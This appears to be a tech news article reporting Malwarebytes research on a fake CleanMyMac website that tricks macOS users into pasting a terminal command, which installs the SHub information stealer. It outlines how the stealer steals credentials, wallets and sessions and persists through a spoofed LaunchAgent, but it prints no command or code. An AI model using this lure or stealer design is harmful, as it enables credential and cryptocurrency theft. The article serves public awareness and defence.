- Fake CleanMyMac Utility Spreads SHub Information Stealer
- Attack tricks users into pasting terminal commands
- Malware Steals Credentials, Cryptocurrencies, and Persists Through a Backdoor
A fake Mac utility program tricks users into installing information-stealing malware that exfiltrates passwords, sensitive files and even money, experts have warned.
Security researchers Malwarebytes said the program was part of a larger, highly sophisticated campaign that also included a custom website, reputable brand spoofing, a loader, and the good old ClickFix approach.
Researchers said the campaign spoofed CleanMyMac, a legitimate Mac optimization program built by MacPaw, creating a nearly identical website on cleanmymacos.[DOT]org, which makes it easy for people to confuse it with the real thing. However, instead of simply downloading and running an installer, victims are asked to open a terminal and paste a command that fetches the payload from a third-party server.
Article continues below
Steal files and establish persistence
“Instead of exploiting a vulnerability, this tricks the user into running the malware themselves,” Malwarebytes explained. “Since the command is executed voluntarily, protections such as Gatekeeper, notarization controls, and XProtect offer little protection once the user pastes the command and hits Return.”
The malware installed this way is called SHub and upon installation it will ask the victim for their macOS password. Since the entire installation process is somewhat unorthodox and might seem like something a power user would do, users might consider it common practice, the researchers explained.
However, the password actually gives SHub access to the macOS keychain, Wi-Fi credentials, app tokens, and other private keys.
“With the password in hand, SHub begins a systematic scan of the machine,” Malwarebytes researchers said.
After stealing passwords, cookies, autofill data, crypto wallet extensions, iCloud account data, Telegram session files and other valuables, it removes a second-stage backdoor that replaces some crypto wallet apps with malicious copies. This way, the malware maintains its persistence and even enables additional cryptocurrency thefts down the line.
Finally, the crooks would install a LaunchAgent by spoofing a Google update service.
“In practice, this gives attackers the ability to execute commands on the infected Mac at any time until the persistence mechanism is discovered and removed,” the report concludes.
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
